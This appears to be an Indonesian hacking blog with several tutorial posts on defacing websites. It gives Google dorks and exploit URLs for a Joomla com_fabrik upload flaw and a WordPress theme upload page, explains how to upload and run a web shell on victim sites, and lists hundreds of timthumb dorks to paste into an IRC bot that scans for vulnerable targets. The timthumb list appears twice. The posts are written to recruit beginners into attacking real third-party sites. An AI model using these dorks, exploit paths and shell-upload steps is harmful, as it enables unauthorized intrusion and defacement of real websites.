Masih membahas tentang deface.
Cara yang satu ini cukup mudah dilakukan. Dengan menggunakan exploit com_fabrik, kita bisa mengupload shell kita untuk melakukan deface terhadap web tersebut. Ok simak tutorial berikut.
1. Ketik dork berikut ke google : inurl:index.php?option=com_fabrik
2. Akan ada banyak web, anda buka terserah yang mana
3. Masukkan exploit ini : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Contoh : www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Jika tidak berhasil cari target lain. Jika berhasil akan muncul form upload seperti ini
http://1.bp.blogspot.com/-O8NtWBE6Ga8/UX4hzSfRNTI/AAAAAAAAB0U/7GyMI39JQ3A/s400/cats.jpg
Saturday, August 9, 2014
Sunday, August 3, 2014
Tutorial deface via wp-content
walaupun tutor ini udah lama alias jadul, jadi gak ada salahnya jika admin berbagi ke orang yang belum tau dan baru mendalami dunia hacking. di sini admin akan bernagi cara deface wordpress melalui bug uploadnya..
pertama kalian harus bisa mencari web/site yang vuln dengan menggunakan dork wp-content.
Dork yang akan kita gunakan yaitu :
inurl:/wp-content/themes/KidzStore
Dork di atas bisa di kembangkan sendiri.
cara menggunakan dorknya :
Copy dork di atas ke google, kemudian pilih salah satu site yang muncul.
setelah ada site yang di pilih sebagai target kita, maka kita gunakan exploit :
http://site.com/wp-content/themes/WPStore/upload
nah, kalau sudah muncul halaman upload, kita coba upload shell deface kita (PHP, html,jpg, atau txt)
Jika shell php gak bisa, maka ganti dengan shell html atau lainnya. Pada beberapa site bisa diakali dengan menggunakan Plugin Mozilla FireFox yakni Tamper Data (bisa di download di web resmi mozilla)
setelah sukses mengupload shell kita (ada tulisan Uploaded Successfully), sekarang saatnya kita mengeksekusinya dengan cara :
http://site.com/wp-content/uploads/products_img/[file]
Ex : http://farmershowcase.com/wp-content/uploads/products_img/bn.jpg
Jika masih bingung, silahkan bertanya.
Maaf tidak di sertakan ScreenShotnya...
Tuesday, July 15, 2014
Bug Dork Timthumb Terbaru Update 2014
Hello assalamualaikum sobat GFI, apa kabar?
o iya sebelumnya admin mo sampaikan dlu selamat berbuka puasa aja buat daerah wilayah sulawesi.
kali ini admin mo share Bug Dork yang biasa dipake buat cari target website wordpress.
Kali ini admin kasih cara paling Gampang Buat hack website CMS wordpress Tanpa kita harus susah" cari celah disalah satu website.
disini kita hanya memerlukan 1 applikasi MIRC kalo belum punya bisa download Di http://www.tusfiles.net/o3vwk1m48h50
trus sobat bisa masuk ke server yang sudah admin sediakan disini.
/server irc.cyberbintauna.org:6667
Untuk cara pakai bug dorknya gampang, tinggal sobat Kopi Paste saja ke chanel irc, maka bot yang admin sudah sediakan akan secara auto menscan website-website yang mempunyai celah buat kita tembus. Berikut Bug dorknya.
!tim /wp-content/themes/welcome_inn/thumb.php "/themes/welcome_inn" +page_id=
!tim /wp-content/themes/Snapwire/timthumb.php "/themes/Snapwire/"
!tim /wp-content/themes/Aggregate/timthumb.php "Aggregate Logo"
!tim /wp-content/themes/DeepFocus/timthumb.php "DeepFocus Logo"
!tim /wp-content/themes/sportpress/scripts/timthumb.php "Sport WordPress Theme by"
!tim /wp-content/themes/TheStyle/timthumb.php "thestyle logo"
!tim /wp-content/themes/fashion/includes/thumb.php "/themes/fashion/includes/"
!tim /wp-content/themes/suffusion/timthumb.php "Suffusion theme by Sayontan Sinha"
!tim /wp-content/themes/suffusion/timthumb.php "Suffusion WordPress"
!tim /wp-content/themes/Webly/timthumb.php "webly logo"
!tim /wp-content/themes/newoffer/timthumb.php "WordPress Theme by iKarina"
!tim /wp-content/themes/modularity/includes/timthumb.php "modularity theme by"
!tim /wp-content/themes/Polished/timthumb.php "polished logo"
!tim /wp-content/themes/ecobiz/timthumb.php "Designed by imediapixel.com"
!tim /wp-content/themes/ecobiz/timthumb.php "themes/ecobiz" +"Posted on *"
!tim /wp-content/themes/Lumin/timthumb.php "Powered by WordPress" "Designed by Elegant Themes"
!tim /wp-content/themes/OptimizePress/timthumb.php "Powered by Optimizepress"
!tim /wp-content/themes/Magnificent/timthumb.php "Magnificent Logo"
!tim /wp-content/themes/goodnews/framework/scripts/timthumb.php "Goodnews Theme By Momizat Team"
!tim /wp-content/themes/Chameleon/timthumb.php "Chameleon logo"
!tim /wp-content/themes/newsworld/thumbopen.php "Powered by NewsWorld"
!tim /wp-content/themes/bestvariety/scripts/timthumb.php "/themes/bestvariety"
!tim /wp-content/themes/Envisioned/timthumb.php "envisioned logo"
!tim /wp-content/themes/AskIt/timthumb.php "AskIt logo"
!tim /wp-content/themes/dandelion_v2.5/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.2.1/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.1/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.2/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.3/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.4/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/retreat/thumb.php "WordPress Tumblog Theme" "Exclusively by"
!tim /wp-content/themes/kingsize/timthumb.php "Hide menu" kingsize
!tim /wp-content/themes/ElegantEstate/timthumb.php "ElegantEstate logo"
!tim /wp-content/themes/ElegantEstate/timthumb.php "/themes/ElegantEstate/"
!tim /wp-content/themes/LondonLive/thumb.php "/themes/LondonLive/"
!tim /wp-content/themes/LondonLive/thumb.php "Designed by Skyali"
!tim /wp-content/themes/LeanBiz/timthumb.php "LeanBiz Theme"
!tim /wp-content/themes/LeanBiz/timthumb.php "LeanBiz Theme" "designed by"
!tim /wp-content/themes/openair/thumb.php "Open Air by" wordpress
!tim /wp-content/themes/mosaic/inc/timthumb.php "Theme Design by iKreativ"
!tim /wp-content/themes/striking/includes/timthumb.php "/themes/striking/"
!tim /wp-content/themes/invictus/timthumb.php "Invictus" "Background Wordpress Theme"
!tim /wp-content/themes/masterful/timthumb.php "/themes/masterful/"
!tim /wp-content/themes/handcrafted/functions/scripts/timthumb.php "Designed & Developed by der|Design"
!tim /wp-content/plugins/pointelle-slider/includes/timthumb.php "/plugins/pointelle-slider/"
!tim /wp-content/themes/TheTravelTheme/includes/timthumb.php "/themes/TheTravelTheme/"
!tim /wp-content/themes/Mentor/timthumb.php "Mentor WordPress Theme designed by"
!tim /wp-content/themes/metrolo/scripts/thumb.php "/themes/metrolo/"
!tim /wp-content/themes/webstudio/thumb.php "/themes/webstudio/"
!tim /wp-content/themes/easini/timthumb.php "/themes/easini/"
!tim /wp-content/themes/theblock/timthumb.php "/themes/theblock/"
!tim /wp-content/themes/intelligible/timthumb.php "/themes/intelligible/"
!tim /wp-content/themes/vilisya/timthumb.php "/themes/vilisya/"
!tim /wp-content/themes/Cadca/php/timthumb.php "/themes/Cadca/"
!tim /wp-content/themes/urbanhip/includes/timthumb.php "/themes/urbanhip/"
!tim /wp-content/themes/duotive-three/includes/timthumb.php "/themes/duotive-three/"
!tim /wp-content/themes/duotive-three/includes/timthumb.php "created by duotive"
!tim /wp-content/themes/hulk/scripts/timthumb.php "/themes/hulk/scripts/"
!tim /wp-content/themes/village/timthumb.php "themes/village/"
!tim /wp-content/themes/picnic/inc/timthumb.php "/themes/picnic/"
!tim /wp-content/themes/monmarthe/php/thumb.php "/themes/monmarthe"
!tim /wp-content/themes/monmarthe/php/thumb.php "2010 Monmarthe"
!tim /wp-content/themes/monmarthe/php/thumb.php "2011 Monmarthe"
!tim /wp-content/themes/life/scripts/timthumb.php "iamthemes.com"
!tim /wp-content/themes/life/scripts/timthumb.php "/themes/life/scripts/"
!tim /wp-content/themes/thefirm/wizy/scripts/timthumb/timthumb.php "/thefirm/wizy/scripts/timthumb/"
!tim /wp-content/themes/thecotton/lib/utils/timthumb.php "/themes/thecotton/"
!tim /wp-content/themes/thecotton/lib/utils/timthumb.php "Powered by The Cotton Theme"
!tim /wp-content/themes/gridline/lib/scripts/timthumb.php "Gridline designed and produced by"
!tim /wp-content/themes/Inspired/thumb.php "Inspired" "Designed by "
!tim /wp-content/themes/specere/inc/timthumb.php "/themes/specere/inc/"
!tim /wp-content/themes/Nova/timthumb.php "nova logo"
!tim /wp-content/themes/TheProfessional/timthumb.php "Designed by Elegant Themes"
!tim /wp-content/themes/TheCorporation/timthumb.php "Designed by Elegant Themes"
!tim /wp-content/themes/u-design/scripts/timthumb.php "U-Design is proudly powered by "
!tim /wp-content/themes/arthemia-premium/scripts/timthumb.php "Arthemia Premium by ColorLabs Project"
!tim /wp-content/themes/GrungeMag/timthumb.php "GrungeMag"
!tim /wp-content/themes/MyCuisine/timthumb.php "mycuisine logo"
!tim /wp-content/themes/dt-chocolate/thumb.php "chocolate WP" "All rights reserved"
!tim /wp-content/themes/prosto/functions/thumb.php "prosto. All rights reserved"
!tim /wp-content/themes/snapshot/thumb.php "Snapshot Theme by"
!tim /wp-content/themes/premiumnews/thumb.php "Original News Theme by "
!tim /wp-content/themes/Feather/timthumb.php "feather Logo"
!tim /wp-content/themes/InReview/timthumb.php "inreview logo"
!tim /wp-content/themes/InReview/timthumb.php "inreview logo" "designed by"
!tim /wp-content/themes/Modest/timthumb.php "We Design With Modesty" "Designed by"
!tim /wp-content/themes/Modest/timthumb.php "We Design With Modesty"
!tim /wp-content/themes/gazette/thumb.php "Gazette Theme by"
!tim /wp-content/themes/flashnews/thumb.php "Flash News Theme by"
!tim /wp-content/themes/livewire/thumb.php "Live Wire Series Theme by"
!tim /wp-content/themes/overeasy/thumb.php "Powered by WordPress" "OverEasy by"
!tim /wp-content/themes/cushy/thumb.php "Cushy Theme by"
!tim /wp-content/themes/dailyedition/thumb.php "Daily Edition Theme by"
!tim /wp-content/themes/canvas/thumb.php "themes/canvas"
!tim /wp-content/themes/freshnews/thumb.php "themes/freshnews"
!tim /wp-content/themes/aperture/thumb.php "themes/aperture"
!tim /wp-content/themes/biznizz/thumb.php "themes/biznizz"
!tim /wp-content/themes/Spectrum/thumb.php "themes/Spectrum"
!tim /wp-content/themes/CoffeeBreak/thumb.php "themes/CoffeeBreak"
!tim /wp-content/themes/Continuum/thumb.php "themes/Continuum"
!tim /wp-content/themes/telegraph/scripts/timthumb.php "telegraph/scripts" "Designed by"
!tim /wp-content/themes/photoria/scripts/timthumb.php "Portfolio WordPress Theme by"
!tim /wp-content/themes/graphix/scripts/timthumb.php "themes/graphix" "Designed by"
!tim /wp-content/themes/cadabrapress/scripts/timthumb.php "cadabrapress" "All Rights Reserved" "designed by"
!tim /wp-content/themes/cadabrapress/scripts/timthumb.php "/cadabrapress/scripts/"
!tim /wp-content/themes/magazinum/scripts/timthumb.php "Magazinum" "All Rights Reserved" "designed by"
!tim /wp-content/themes/videozoom/scripts/timthumb.php "WordPress Video Theme by"
!tim /wp-content/themes/videozoom/scripts/timthumb.php "/videozoom/scripts/"
!tim /wp-content/themes/manifesto/scripts/timthumb.php "manifesto/scripts"
!tim /wp-content/themes/gallery/scripts/timthumb.php "GALLERY Theme by"
!tim /wp-content/themes/optimize/thumb.php "themes/optimize"
!tim /wp-content/themes/DynamiX/lib/scripts/timthumb.php "Powered By DynamiX"
!tim /wp-content/themes/Karma/functions/timthumb.php "themes/Karma"
!tim /wp-content/themes/Karma/functions/thumbs.php "themes/Karma"
!tim /wp-content/themes/Growing-Feature/includes/thumb.php "/themes/Growing-Feature" +logo
!tim /wp-content/themes/profitstheme/thumb.php "Powered By Profits Theme From"
!tim /wp-content/themes/Nyke/timthumb.php "/themes/Nyke/"
!tim /wp-content/themes/rend/scripts/timthumb.php "themes/rend"
!tim /wp-content/themes/echea/timthumb.php "themes/echea"
!tim /wp-content/themes/awake/lib/scripts/thumb.php "themes/awake"
!tim /wp-content/themes/academica/scripts/timthumb.php "Education WordPress Theme by"
!tim /wp-content/themes/academica/scripts/timthumb.php "/academica/scripts/"
!tim /wp-content/themes/parachute/lib/scripts/timthumb.php "themes/parachute"
!tim /wp-content/themes/parachute/lib/scripts/timthumb.php "Parachute designed and produced by GhostPool"
!tim /wp-content/themes/soulbop/scripts/timthumb.php "soulbop/scripts"
!tim /wp-content/themes/airfolio/scripts/timthumb.php "themes/airfolio"
!tim /wp-content/themes/Romix/scripts/thumb.php "Romix/scripts"
!tim /wp-content/themes/granda/scripts/timthumb.php "/granda/scripts/"
!tim /wp-content/themes/aquitaine/lib/custom/timthumb.php "/themes/aquitaine/"
!tim /wp-content/themes/ibuze/scripts/timthumb.php "/ibuze/scripts/"
!tim /wp-content/themes/reviewit/lib/scripts/timthumb.php "/themes/reviewit/"
!tim /wp-content/themes/bizpress/scripts/timthumb.php "/bizpress/scripts/"
!tim /wp-content/themes/headlines/thumb.php "themes/headlines"
!tim /wp-content/themes/genoa/timthumb.php "WordPress and WPCrunchy"
!tim /wp-content/themes/multidesign/scripts/timthumb.php "2010 iamthemes.com"
!tim /wp-content/themes/smoke/scripts/timthumb.php "2010 iamthemes.com"
!tim /wp-content/themes/genoa/timthumb.php "Genoa Theme"
!tim /wp-content/plugins/kino-gallery/timthumb.php "Developed by Kino Creative"
!tim /wp-content/themes/tarnished/lib/scripts/timthumb.php "Copyright © Tarnished"
!tim /wp-content/themes/exhibit/lib/scripts/timthumb.php "Exhibit designed and produced by GhostPool."
!tim /wp-content/themes/averin/timthumb.php "averin" Logo
!tim /wp-content/themes/redcarpet/thumbopen.php "themes/redcarpet/"
!tim /wp-content/themes/comfy/thumbopen.php "/themes/comfy/"
!tim /wp-content/themes/comfy-3/thumbopen.php "themes/comfy-3/"
!tim /wp-content/themes/comfy-3.0.9/thumbopen.php "/comfy-3.0.9/"
!tim /wp-content/themes/headlines_enhanced/thumb.php "PLR Blogs · Sitemap · Privacy Policy"
!tim /wp-content/themes/widescreen/includes/timthumb.php "— Hide menu"
!tim /wp-content/themes/push/framework/lib/timthumb.php "/themes/push/framework/lib/"
!tim /wp-content/themes/headlines/thumb.php "Designed by Top Wp Plugins"
!tim /wp-content/themes/thejournal/thumb.php "/themes/thejournal/"
!tim /wp-content/themes/couponpress/thumbs/_tbs.php "/themes/couponpress/"
!tim /wp-content/themes/rockwell_v1.3/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/rockwell_v1.0/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/rockwell_v1.7.1/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/rockwell/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/catalyst/timthumb.php "themes/catalyst"
!tim /wp-content/themes/clockstone/theme/classes/timthumb.php "Clockstone" "All Rights Reserved"
!tim /wp-content/themes/clockstone/theme/classes/timthumb.php "/themes/clockstone/"
!tim /wp-content/themes/sakura/plugins/woo-tumblog/functions/thumb.php "Black Sakura WP"
!tim /wp-content/themes/broadcast/thumb.php "Broadcast. All Rights Reserved"
!tim /wp-content/themes/amplus/functions/timthumb.php "/amplus/functions/"
!tim /wp-content/themes/cubed/functions/timthumb.php "/themes/cubed/functions/"
!tim /wp-content/themes/curvo/functions/timthumb.php "/curvo/functions/"
!tim /wp-content/themes/peano/functions/img_resize/timthumb.php "/themes/peano/functions"
!tim /wp-content/themes/especial/libraries/timthumb.php "Especial Wordpress Theme"
!tim /wp-content/themes/city/scripts/timthumb.php "City Themes" "All rights reserved."
!tim /wp-content/themes/aquitaine/lib/custom/timthumb.php "Aquitaine Ltd. All rights reserved"
!tim /wp-content/themes/dropholio/functions/img_resize/timthumb.php "/themes/dropholio/"
!tim /wp-content/themes/dropholio/functions/img_resize/timthumb.php "2011 Dropholio"
!tim /wp-content/themes/stufe/scripts/timthumb.php "/stufe/scripts/"
!tim /wp-content/themes/thestation/thumb.php "/themes/thestation/"
!tim /wp-content/themes/mainstream/thumb.php "/themes/mainstream/"
!tim /wp-content/themes/rockstar/thumb.php "/themes/rockstar/"
!tim /wp-content/themes/bueno/thumb.php "/themes/bueno/"
!tim /wp-content/themes/backstage/thumb.php "/themes/backstage/"
!tim /wp-content/themes/deliciousmagazine/thumb.php "/themes/deliciousmagazine/"
!tim /wp-content/themes/mosaico/js/timthumb.php "/themes/mosaico/"
!tim /wp-content/themes/machtastic/_assets/timthumb.php "themes/machtastic"
!tim /wp-content/themes/cold/lib/timthumb.php "/themes/cold/lib/"
!tim /wp-content/themes/spicy/lib/timthumb.php "/themes/spicy/lib/"
!tim /wp-content/themes/lunar/lib/timthumb.php "/themes/lunar/lib/"
!tim /wp-content/themes/kolos/thumb.php "/themes/kolos/"
!tim /wp-content/themes/photobox/themify/img.php "/themes/photobox/"
!tim /wp-content/themes/bloggie/themify/img.php "/themes/bloggie/"
!tim /wp-content/themes/blogfolio/themify/img.php "/themes/blogfolio/"
!tim /wp-content/themes/bizco/themify/img.php "/themes/bizco/"
!tim /wp-content/themes/thememin/themify/img.php "/themes/ThemeMin"
!tim /wp-content/themes/sleex/scripts/thumb.php "/themes/sleex/"
!tim /wp-content/themes/matchpoint/functions/thumb.php "/themes/matchpoint/"
!tim /wp-content/themes/nitro/library/functions/timthumb.php "/themes/nitro/library/"
!tim /wp-content/themes/visual/library/functions/timthumb.php "/themes/visual/library/functions/"
!tim /wp-content/themes/myjourney_3.1/thumb.php "wp-content/themes/myjourney"
!tim /wp-content/themes/adinda/timthumb.php "themes/adinda"
!tim /wp-content/themes/myjourney/thumb.php "themes/myjourney/"
!tim /wp-content/themes/modus/thumb.php "/themes/modus/"
!tim /wp-content/themes/spitz/lib/scripts/timthumb.php "/themes/spitz/"
!tim /wp-content/themes/handcrafted/functions/scripts/timthumb.php "/themes/handcrafted/functions/"
!tim /wp-content/themes/vulcan/timthumb.php "/wp-content/themes/vulcan/timthumb.php"
!tim /wp-content/themes/equator/timthumb.php "/wp-content/themes/equator/timthumb.php"
!tim /wp-content/themes/FactoryWP/javascript/timthumb.php "/wp-content/themes/factory"
!tim /wp-content/themes/multimedia/thumb.php "/wp-content/themes/multimedia" ?src
!tim /wp-content/themes/glance/inc/timthumb.php "/wp-content/themes/glance"
!tim /wp-content/themes/picnic/inc/timthumb.php "/wp-content/themes/picnic"
!tim /wp-content/themes/setinstone/inc/timthumb.php "/themes/setinstone/inc/"
!tim /wp-content/themes/setinstone/inc/timthumb.php "Copyright 2011 Turkhitbox"
!tim /wp-content/themes/nvision/utils/timthumb.php "themes/nvision/utils/"
!tim /wp-content/themes/mercedesa/includes/thumb.php "/themes/mercedesa/includes/"
!tim /wp-content/themes/village/timthumb.php "/wp-content/themes/village" ?src=
!tim /wp-content/themes/explode/includes/timthumb.php "/wp-content/themes/explode/"
!tim /wp-content/themes/delight/scripts/timthumb.php "/themes/delight/scripts/"
!tim /wp-content/themes/delight/scripts/timthumb.php "©2011 Pixedelic by Consorzio Creativo"
!tim /wp-content/themes/precious/inc/timthumb.php "/themes/precious/inc/"
!tim /wp-content/themes/eruption/framework/lib/timthumb.php "/themes/eruption/"
!tim /wp-content/themes/cleanple/theme/classes/timthumb.php "/cleanple/theme/classes/"
!tim /wp-content/themes/blakesley/theme/classes/timthumb.php "/blakesley/theme/classes"
!tim /wp-content/themes/tribune/scripts/timthumb.php "tribune/scripts"
!tim /wp-content/themes/rezo/themify/img.php "wp-content/themes/Rezo" ?src=
!tim /wp-content/themes/edmin/themify/img.php "wp-content/themes/Edmin" ?src=
!tim /wp-content/themes/wigi/themify/img.php "wp-content/themes/wigi" ?src=
!tim /wp-content/themes/sidepane/themify/img.php "wp-content/themes/Sidepane" ?src=
!tim /wp-content/themes/Colt/thumb.php "wp-content/themes/Colt" ?src=
!tim /wp-content/themes/OnTheGo/timthumb.php "wp-content/themes/On the Go" ?src=
!tim /wp-content/themes/InnovationScience2/thumb.php "wp-content/themes/Innovation+Science" ?src=
!tim /wp-content/themes/Avenue/timthumb.php "wp-content/themes/Avenue" ?src=
!tim /wp-content/themes/blacklabel/framework/timthumb.php "/themes/blacklabel/"
Sumber : http://www.cyberbintauna.org/2014/07/bug-dork-timthumb-terbaru-update-2014.html
o iya sebelumnya admin mo sampaikan dlu selamat berbuka puasa aja buat daerah wilayah sulawesi.
kali ini admin mo share Bug Dork yang biasa dipake buat cari target website wordpress.
Kali ini admin kasih cara paling Gampang Buat hack website CMS wordpress Tanpa kita harus susah" cari celah disalah satu website.
disini kita hanya memerlukan 1 applikasi MIRC kalo belum punya bisa download Di http://www.tusfiles.net/o3vwk1m48h50
trus sobat bisa masuk ke server yang sudah admin sediakan disini.
/server irc.cyberbintauna.org:6667
Untuk cara pakai bug dorknya gampang, tinggal sobat Kopi Paste saja ke chanel irc, maka bot yang admin sudah sediakan akan secara auto menscan website-website yang mempunyai celah buat kita tembus. Berikut Bug dorknya.
!tim /wp-content/themes/welcome_inn/thumb.php "/themes/welcome_inn" +page_id=
!tim /wp-content/themes/Snapwire/timthumb.php "/themes/Snapwire/"
!tim /wp-content/themes/Aggregate/timthumb.php "Aggregate Logo"
!tim /wp-content/themes/DeepFocus/timthumb.php "DeepFocus Logo"
!tim /wp-content/themes/sportpress/scripts/timthumb.php "Sport WordPress Theme by"
!tim /wp-content/themes/TheStyle/timthumb.php "thestyle logo"
!tim /wp-content/themes/fashion/includes/thumb.php "/themes/fashion/includes/"
!tim /wp-content/themes/suffusion/timthumb.php "Suffusion theme by Sayontan Sinha"
!tim /wp-content/themes/suffusion/timthumb.php "Suffusion WordPress"
!tim /wp-content/themes/Webly/timthumb.php "webly logo"
!tim /wp-content/themes/newoffer/timthumb.php "WordPress Theme by iKarina"
!tim /wp-content/themes/modularity/includes/timthumb.php "modularity theme by"
!tim /wp-content/themes/Polished/timthumb.php "polished logo"
!tim /wp-content/themes/ecobiz/timthumb.php "Designed by imediapixel.com"
!tim /wp-content/themes/ecobiz/timthumb.php "themes/ecobiz" +"Posted on *"
!tim /wp-content/themes/Lumin/timthumb.php "Powered by WordPress" "Designed by Elegant Themes"
!tim /wp-content/themes/OptimizePress/timthumb.php "Powered by Optimizepress"
!tim /wp-content/themes/Magnificent/timthumb.php "Magnificent Logo"
!tim /wp-content/themes/goodnews/framework/scripts/timthumb.php "Goodnews Theme By Momizat Team"
!tim /wp-content/themes/Chameleon/timthumb.php "Chameleon logo"
!tim /wp-content/themes/newsworld/thumbopen.php "Powered by NewsWorld"
!tim /wp-content/themes/bestvariety/scripts/timthumb.php "/themes/bestvariety"
!tim /wp-content/themes/Envisioned/timthumb.php "envisioned logo"
!tim /wp-content/themes/AskIt/timthumb.php "AskIt logo"
!tim /wp-content/themes/dandelion_v2.5/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.2.1/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.1/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.2/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.3/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.4/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/retreat/thumb.php "WordPress Tumblog Theme" "Exclusively by"
!tim /wp-content/themes/kingsize/timthumb.php "Hide menu" kingsize
!tim /wp-content/themes/ElegantEstate/timthumb.php "ElegantEstate logo"
!tim /wp-content/themes/ElegantEstate/timthumb.php "/themes/ElegantEstate/"
!tim /wp-content/themes/LondonLive/thumb.php "/themes/LondonLive/"
!tim /wp-content/themes/LondonLive/thumb.php "Designed by Skyali"
!tim /wp-content/themes/LeanBiz/timthumb.php "LeanBiz Theme"
!tim /wp-content/themes/LeanBiz/timthumb.php "LeanBiz Theme" "designed by"
!tim /wp-content/themes/openair/thumb.php "Open Air by" wordpress
!tim /wp-content/themes/mosaic/inc/timthumb.php "Theme Design by iKreativ"
!tim /wp-content/themes/striking/includes/timthumb.php "/themes/striking/"
!tim /wp-content/themes/invictus/timthumb.php "Invictus" "Background Wordpress Theme"
!tim /wp-content/themes/masterful/timthumb.php "/themes/masterful/"
!tim /wp-content/themes/handcrafted/functions/scripts/timthumb.php "Designed & Developed by der|Design"
!tim /wp-content/plugins/pointelle-slider/includes/timthumb.php "/plugins/pointelle-slider/"
!tim /wp-content/themes/TheTravelTheme/includes/timthumb.php "/themes/TheTravelTheme/"
!tim /wp-content/themes/Mentor/timthumb.php "Mentor WordPress Theme designed by"
!tim /wp-content/themes/metrolo/scripts/thumb.php "/themes/metrolo/"
!tim /wp-content/themes/webstudio/thumb.php "/themes/webstudio/"
!tim /wp-content/themes/easini/timthumb.php "/themes/easini/"
!tim /wp-content/themes/theblock/timthumb.php "/themes/theblock/"
!tim /wp-content/themes/intelligible/timthumb.php "/themes/intelligible/"
!tim /wp-content/themes/vilisya/timthumb.php "/themes/vilisya/"
!tim /wp-content/themes/Cadca/php/timthumb.php "/themes/Cadca/"
!tim /wp-content/themes/urbanhip/includes/timthumb.php "/themes/urbanhip/"
!tim /wp-content/themes/duotive-three/includes/timthumb.php "/themes/duotive-three/"
!tim /wp-content/themes/duotive-three/includes/timthumb.php "created by duotive"
!tim /wp-content/themes/hulk/scripts/timthumb.php "/themes/hulk/scripts/"
!tim /wp-content/themes/village/timthumb.php "themes/village/"
!tim /wp-content/themes/picnic/inc/timthumb.php "/themes/picnic/"
!tim /wp-content/themes/monmarthe/php/thumb.php "/themes/monmarthe"
!tim /wp-content/themes/monmarthe/php/thumb.php "2010 Monmarthe"
!tim /wp-content/themes/monmarthe/php/thumb.php "2011 Monmarthe"
!tim /wp-content/themes/life/scripts/timthumb.php "iamthemes.com"
!tim /wp-content/themes/life/scripts/timthumb.php "/themes/life/scripts/"
!tim /wp-content/themes/thefirm/wizy/scripts/timthumb/timthumb.php "/thefirm/wizy/scripts/timthumb/"
!tim /wp-content/themes/thecotton/lib/utils/timthumb.php "/themes/thecotton/"
!tim /wp-content/themes/thecotton/lib/utils/timthumb.php "Powered by The Cotton Theme"
!tim /wp-content/themes/gridline/lib/scripts/timthumb.php "Gridline designed and produced by"
!tim /wp-content/themes/Inspired/thumb.php "Inspired" "Designed by "
!tim /wp-content/themes/specere/inc/timthumb.php "/themes/specere/inc/"
!tim /wp-content/themes/Nova/timthumb.php "nova logo"
!tim /wp-content/themes/TheProfessional/timthumb.php "Designed by Elegant Themes"
!tim /wp-content/themes/TheCorporation/timthumb.php "Designed by Elegant Themes"
!tim /wp-content/themes/u-design/scripts/timthumb.php "U-Design is proudly powered by "
!tim /wp-content/themes/arthemia-premium/scripts/timthumb.php "Arthemia Premium by ColorLabs Project"
!tim /wp-content/themes/GrungeMag/timthumb.php "GrungeMag"
!tim /wp-content/themes/MyCuisine/timthumb.php "mycuisine logo"
!tim /wp-content/themes/dt-chocolate/thumb.php "chocolate WP" "All rights reserved"
!tim /wp-content/themes/prosto/functions/thumb.php "prosto. All rights reserved"
!tim /wp-content/themes/snapshot/thumb.php "Snapshot Theme by"
!tim /wp-content/themes/premiumnews/thumb.php "Original News Theme by "
!tim /wp-content/themes/Feather/timthumb.php "feather Logo"
!tim /wp-content/themes/InReview/timthumb.php "inreview logo"
!tim /wp-content/themes/InReview/timthumb.php "inreview logo" "designed by"
!tim /wp-content/themes/Modest/timthumb.php "We Design With Modesty" "Designed by"
!tim /wp-content/themes/Modest/timthumb.php "We Design With Modesty"
!tim /wp-content/themes/gazette/thumb.php "Gazette Theme by"
!tim /wp-content/themes/flashnews/thumb.php "Flash News Theme by"
!tim /wp-content/themes/livewire/thumb.php "Live Wire Series Theme by"
!tim /wp-content/themes/overeasy/thumb.php "Powered by WordPress" "OverEasy by"
!tim /wp-content/themes/cushy/thumb.php "Cushy Theme by"
!tim /wp-content/themes/dailyedition/thumb.php "Daily Edition Theme by"
!tim /wp-content/themes/canvas/thumb.php "themes/canvas"
!tim /wp-content/themes/freshnews/thumb.php "themes/freshnews"
!tim /wp-content/themes/aperture/thumb.php "themes/aperture"
!tim /wp-content/themes/biznizz/thumb.php "themes/biznizz"
!tim /wp-content/themes/Spectrum/thumb.php "themes/Spectrum"
!tim /wp-content/themes/CoffeeBreak/thumb.php "themes/CoffeeBreak"
!tim /wp-content/themes/Continuum/thumb.php "themes/Continuum"
!tim /wp-content/themes/telegraph/scripts/timthumb.php "telegraph/scripts" "Designed by"
!tim /wp-content/themes/photoria/scripts/timthumb.php "Portfolio WordPress Theme by"
!tim /wp-content/themes/graphix/scripts/timthumb.php "themes/graphix" "Designed by"
!tim /wp-content/themes/cadabrapress/scripts/timthumb.php "cadabrapress" "All Rights Reserved" "designed by"
!tim /wp-content/themes/cadabrapress/scripts/timthumb.php "/cadabrapress/scripts/"
!tim /wp-content/themes/magazinum/scripts/timthumb.php "Magazinum" "All Rights Reserved" "designed by"
!tim /wp-content/themes/videozoom/scripts/timthumb.php "WordPress Video Theme by"
!tim /wp-content/themes/videozoom/scripts/timthumb.php "/videozoom/scripts/"
!tim /wp-content/themes/manifesto/scripts/timthumb.php "manifesto/scripts"
!tim /wp-content/themes/gallery/scripts/timthumb.php "GALLERY Theme by"
!tim /wp-content/themes/optimize/thumb.php "themes/optimize"
!tim /wp-content/themes/DynamiX/lib/scripts/timthumb.php "Powered By DynamiX"
!tim /wp-content/themes/Karma/functions/timthumb.php "themes/Karma"
!tim /wp-content/themes/Karma/functions/thumbs.php "themes/Karma"
!tim /wp-content/themes/Growing-Feature/includes/thumb.php "/themes/Growing-Feature" +logo
!tim /wp-content/themes/profitstheme/thumb.php "Powered By Profits Theme From"
!tim /wp-content/themes/Nyke/timthumb.php "/themes/Nyke/"
